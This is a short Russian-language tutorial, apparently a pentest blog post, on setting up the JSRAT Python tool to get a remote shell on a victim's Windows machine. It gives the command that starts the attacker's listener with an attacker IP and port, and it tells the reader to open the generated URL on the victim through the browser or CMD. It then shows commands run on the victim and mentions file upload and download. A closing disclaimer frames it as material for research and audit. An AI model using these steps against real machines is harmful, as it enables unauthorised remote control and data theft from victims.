JSRAT – это скрипт python, который можно использовать для получения удаленного шелла жертвы.
Установка и настройка
Скачайте инструмент JSRAT здесь
Загрузите и дайте соответствующее разрешение для выполнения скрипта. Рисунок показывает полную установку
Запуск веб-сервера
Запустите и выполните команду:
# python JSRAT.py -i <kali Linux или Attacker Ip> -p 8080
JSRAT предоставляет список URLs.
Скопируйте клиентскую команду для http://192.168.172.143:8080/wtf
Машина жертвы
Откройте этот URL-адрес с помощью браузера жертвы.
Чтобы получить удаленный шелл, сгенерированным URL-адресом, следует открыть с помощью CMD.
После выполнения команды будет получена оболочка.
Возвращаемся на машину атакующего
Вот так !!! Мы подключились к машине жертвы
Попробуем выполнить команду windows: Ipconfig
На приведенном выше рисунке показано, что выполнение команды calc открывает калькулятор windows.
JSRat также может предоставлять файлы загрузки, чтения и скачивания.
Примечание: Информация для исследования, обучения или проведения аудита. Применение в корыстных целях карается законодательством РФ.